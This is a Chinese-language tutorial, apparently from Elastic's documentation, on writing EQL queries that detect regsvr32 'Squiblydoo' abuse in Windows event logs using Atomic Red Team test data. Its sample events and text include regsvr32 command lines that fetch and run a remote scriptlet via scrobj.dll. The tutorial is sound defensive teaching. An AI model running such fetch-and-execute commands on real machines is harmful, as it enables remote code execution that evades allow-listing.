示例:使用EQL检测威胁
edit示例:使用EQL检测威胁
edit本示例教程展示了如何使用EQL来检测安全威胁和其他可疑行为。在这个场景中,您的任务是检测Windows事件日志中的regsvr32滥用。
regsvr32.exe 是一个内置的命令行实用程序,用于在Windows中注册.dll库。作为一个本地工具,regsvr32.exe具有受信任的状态,使其能够绕过大多数允许列表软件和脚本阻止程序。攻击者如果能够访问用户的命令行,可以使用regsvr32.exe通过.dll库运行恶意脚本,即使在其他情况下禁止此类脚本的机器上也能执行。
regsvr32误用的常见变体之一是
Squiblydoo攻击。在
Squiblydoo攻击中,regsvr32.exe命令使用scrobj.dll库来
注册并运行远程脚本。这些命令通常看起来像这样:
"regsvr32.exe /s /u /i:<script-url> scrobj.dll"
设置
edit本教程使用来自 Atomic Red Team 的测试数据集,其中包含模仿 Squiblydoo 攻击的事件。数据已映射到 Elastic Common Schema (ECS) 字段。
开始使用:
-
PUT /_index_template/my-data-stream-template { "index_patterns": [ "my-data-stream*" ], "data_stream": { }, "priority": 500 } -
下载
normalized-T1117-AtomicRed-regsvr32.json。 -
使用批量 API将数据索引到匹配的流中:
curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-data-stream/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json"
-
使用cat indices API来验证数据是否已被索引:
GET /_cat/indices/my-data-stream?v=true&h=health,status,index,docs.count
响应应显示一个
docs.count为150。health status index docs.count yellow open .ds-my-data-stream-2099.12.07-000001 150
获取regsvr32事件的数量
edit首先,获取与regsvr32.exe进程相关的事件计数:
GET /my-data-stream/_eql/search?filter_path=-hits.events { "query": """ any where process.name == "regsvr32.exe" """, "size": 200 }
|
|
|
|
匹配任何具有 |
|
|
返回最多200个匹配事件的结果。 |
响应返回了143个相关事件。
{
"is_partial": false,
"is_running": false,
"took": 60,
"timed_out": false,
"hits": {
"total": {
"value": 143,
"relation": "eq"
}
}
}
检查命令行工件
editregsvr32.exe 进程与143个事件相关联。但regsvr32.exe最初是如何被调用的?又是谁调用了它?regsvr32.exe是一个命令行实用程序。将结果缩小到使用命令行的进程:
GET /my-data-stream/_eql/search
{
"query": """
process where process.name == "regsvr32.exe" and process.command_line.keyword != null
"""
}
该查询匹配一个事件,其event.type为creation,表示regsvr32.exe进程的启动。根据事件的process.command_line值,regsvr32.exe使用scrobj.dll注册了一个脚本RegSvr32.sct。这符合Squiblydoo攻击的行为。
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
}
]
}
}
检查恶意脚本加载
edit检查 regsvr32.exe 是否随后加载了 scrobj.dll 库:
GET /my-data-stream/_eql/search
{
"query": """
library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
"""
}
查询匹配一个事件,确认 scrobj.dll 已被加载。
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
}
]
}
}
确定成功的可能性
edit在许多情况下,攻击者使用恶意脚本来连接到远程服务器或下载其他文件。使用EQL序列查询来检查以下一系列事件:
-
一个
regsvr32.exe进程 -
同一个进程加载
scrobj.dll库 - 同一个进程的任何网络事件
基于在前一个响应中看到的命令行值,您可以预期找到匹配项。然而,这个查询并不是为那个特定命令设计的。相反,它寻找的是一种足够通用的可疑行为模式,以检测类似的威胁。
GET /my-data-stream/_eql/search
{
"query": """
sequence by process.pid
[process where process.name == "regsvr32.exe"]
[library where dll.name == "scrobj.dll"]
[network where true]
"""
}
查询匹配了一个序列,表明攻击可能成功了。
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"sequences": [
{
"join_keys": [
2012
],
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "EF5MJXMBMk1dGnErnBa9",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573238680000,
"destination": {
"address": "151.101.48.133",
"port": "443"
},
"source": {
"address": "192.168.162.134",
"port": "50505"
},
"event": {
"category": "network"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
},
"network": {
"protocol": "tcp",
"direction": "outbound"
}
}
}
]
}
]
}
}